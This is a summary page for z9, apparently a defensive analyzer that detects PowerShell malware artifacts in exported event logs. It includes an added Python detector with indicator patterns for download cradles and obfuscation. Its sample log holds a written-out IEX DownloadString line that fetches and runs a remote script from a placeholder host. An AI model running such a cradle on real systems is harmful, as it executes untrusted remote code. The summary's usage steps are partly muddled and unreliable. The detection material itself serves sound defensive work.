Article Excerpt
This tool detects artifacts of PowerShell-based malware in the event log produced by PowerShell logging. The JSON file can be visualized with viewer.html.
| property | value |
|---|---|
| tags | defensive-tradecraft, deobfuscate, github-repo, powershell, tradecraft-tool |
| url | |
| original_word_count | 160 |
Long Summary
The z9 PowerShell Log Analyzer is a tool that detects the artifacts of PowerShell-based malware in the event log produced by PowerShell logging. It is available online with a sandbox, and requires Python 3+ to install. To use the tool, run the command ‘python z9.py ’ or ‘python z9.py ’. The resulting JSON file can then be visualized with viewer.html.

To prepare the XML file, first enable PowerShell logging by right-clicking the registry file, merging it, and rebooting the PC. After that, export the event log to XML by executing the batch file ‘util/collect_psevent.bat’. The XML files are created under ‘util/logdirectory’ and can be parsed by the tool. To delete the existing event log, execute the batch file ‘util/collect_psevent.bat’ with ‘Run as Admin’.

z9 is therefore a useful tool for detecting the artifacts of PowerShell-based malware in the PowerShell logging event log. It is easy to install and use, and it provides a complete procedure for preparing the XML file.
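As an added illustration of the pipeline the summary describes (exported PowerShell event log XML in, indicator-tagged JSON out), here is a small analyzer written for this page; it is not z9's own code. It assumes the export is a set of standard Windows `<Event>` elements wrapped in a root element, that script-block events carry Event ID 4104 with a `ScriptBlockText` data field, and the indicator names and the sample log are this example's own constructions.

```python
import json
import re
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Constructed sample in the Windows event XML export format, with two
# PowerShell script-block events (Event ID 4104). Not real z9 input.
SAMPLE_XML = r"""<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><EventID>4104</EventID><TimeCreated SystemTime="2024-01-01T10:00:00Z"/></System>
<EventData><Data Name="ScriptBlockText">IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')</Data></EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System><EventID>4104</EventID><TimeCreated SystemTime="2024-01-01T10:00:05Z"/></System>
<EventData><Data Name="ScriptBlockText">Get-ChildItem C:\Users</Data></EventData>
</Event>
</Events>"""

# Defensive indicators often found in malicious script blocks; the labels
# are this example's own, not z9's detection names.
INDICATORS = {
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "base64_decode": re.compile(r"FromBase64String|-enc(odedcommand)?\b", re.I),
    "char_obfuscation": re.compile(r"\[char\]\s*\d+|`[a-z]", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
}

def analyze_events(xml_text):
    """Return one record per 4104 event: time, matched indicators, score."""
    root = ET.fromstring(xml_text)
    records = []
    for ev in root.findall("e:Event", NS):
        if ev.findtext("e:System/e:EventID", namespaces=NS) != "4104":
            continue  # only script-block events carry ScriptBlockText
        data = {d.get("Name"): d.text or ""
                for d in ev.findall("e:EventData/e:Data", NS)}
        script = data.get("ScriptBlockText", "")
        hits = [name for name, rx in INDICATORS.items() if rx.search(script)]
        tc = ev.find("e:System/e:TimeCreated", NS)
        records.append({"time": tc.get("SystemTime") if tc is not None else None,
                        "indicators": hits, "score": len(hits), "script": script})
    return records

if __name__ == "__main__":
    # JSON in the spirit of a viewer-ready output file (the layout is ours)
    print(json.dumps({"events": analyze_events(SAMPLE_XML)}, indent=2))
```

Script blocks with a score of zero are still kept in the output so an analyst can see the full timeline, not just the flagged entries.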
Short Summary
📓 Sh1n0g1/z9
👉🏽 This tool detects artifacts of PowerShell-based malware in the event log produced by PowerShell logging. The JSON file can be visualized with viewer.html.
👉🏽 The z9 PowerShell Log Analyzer detects PowerShell-based malware artifacts from event logs.
👉🏽 It is an online tool that requires Python 3+ for installation.
👉🏽 Users can run the tool with the command 'python z9.py '.
👉🏽 The tool can also generate an output JSON file for visualization purposes.
👉🏽 The JSON file can be visualized using viewer.html.
👉🏽 Enabling PowerShell logging is a prerequisite for using the tool.
👉🏽 PowerShell logging can be enabled by merging a registry file and restarting the computer.
👉🏽 The event log can be exported to XML using the batch file 'util/collect_psevent.bat'.
👉🏽 XML files are created under 'util/logdirectory' for parsing by the tool.
👉🏽 Existing event logs can be deleted by running 'util/collect_psevent.bat' as an administrator.
🔗 source link: https://github.com/Sh1n0g1/z9
🔗 summarized content: https://hut.threathunterz.com/battlefield-intel/tradecraft-tools/sh1n0g1z9
#z9PowerShellLogAnalyzer #PowerShellMalware #Python3+ #VisualizeJSONfile #PrepareXMLfile